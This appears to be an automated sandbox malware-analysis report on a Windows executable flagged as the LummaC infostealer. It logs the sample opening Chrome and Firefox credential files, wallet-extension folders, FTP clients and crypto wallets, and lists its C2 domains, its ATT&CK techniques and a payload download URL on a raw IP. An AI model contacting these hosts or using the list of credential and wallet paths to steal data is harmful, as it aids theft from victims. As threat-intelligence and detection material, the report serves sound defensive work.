Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Source: Yara match	File source: 00000000.00000003.2120373354.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6180, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 6180, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	41 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	11 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Windows Service	2 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	LSASS Memory	223 System Information Discovery	Remote Desktop Protocol	31 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	Logon Script (Windows)	1 Windows Service	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	2 Process Injection	12 Software Packing	NTDS	861 Security Software Discovery	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Bypass User Account Control	Cached Domain Credentials	361 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	361 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	37%	ReversingLabs	Win32.Infostealer.Tinba
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	34%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.all	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
crisiwarny.store	172.67.170.64	true	true		unknown
presticitpo.store	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Reputation
presticitpo.store	true	unknown
scriptyprefej.store	true	unknown
https://crisiwarny.store/api	true	unknown
necklacedmny.store	true	unknown
fadehairucw.store	true	unknown
navygenerayk.store	true	unknown
founpiuer.store	true	unknown
thumbystriw.store	true	unknown
crisiwarny.store	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/a	file.exe, 00000000.00000003.2300704016.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store/apie	file.exe, 00000000.00000003.2300704016.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000000.00000003.2168428370.0000000000D19000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/off/def.exeki	file.exe, 00000000.00000002.2303859977.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2301508761.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300704016.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store/apial	file.exe, 00000000.00000003.2300704016.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000003.2168486851.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168428370.0000000000D19000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000000.00000003.2150707560.00000000056A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000000.00000003.2150707560.00000000056A2000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store/h(g	file.exe, 00000000.00000003.2300704016.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	file.exe, 00000000.00000003.2168486851.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168428370.0000000000D19000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://crisiwarny.store/Y	file.exe, 00000000.00000003.2300704016.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.2151867520.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://crisiwarny.store/k:0	file.exe, 00000000.00000003.2150348093.0000000000D1D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186240547.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2301166696.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181772133.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2193032663.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168486851.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168428370.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168676737.0000000000D1D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181616298.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2304049792.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2150139229.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/	file.exe, file.exe, 00000000.00000003.2300704016.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303555937.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300704016.0000000000C81000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store/k6lv	file.exe, 00000000.00000003.2300704016.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	file.exe, 00000000.00000003.2168486851.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168428370.0000000000D19000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/D	file.exe, 00000000.00000003.2300704016.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store:443/api	file.exe, 00000000.00000003.2300704016.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000003.2168486851.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168428370.0000000000D19000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/x	file.exe, 00000000.00000003.2300704016.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://x1.c.lencr.org/0	file.exe, 00000000.00000003.2150707560.00000000056A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	file.exe, 00000000.00000003.2150707560.00000000056A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000000.00000003.2150707560.00000000056A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000003.2168486851.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168428370.0000000000D19000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000003.2168486851.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168428370.0000000000D19000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/off/def.exe	file.exe, file.exe, 00000000.00000003.2300704016.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303555937.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300704016.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303172541.00000000008FA000.00000004.00000010.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store/	file.exe, 00000000.00000003.2181790016.0000000000CFE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134098522.0000000000CFC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300704016.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120298828.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186257640.0000000000CFC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168754605.0000000000CFC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16:80/off/def.exerosoft	file.exe, 00000000.00000002.2303555937.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300704016.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000003.2151867520.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
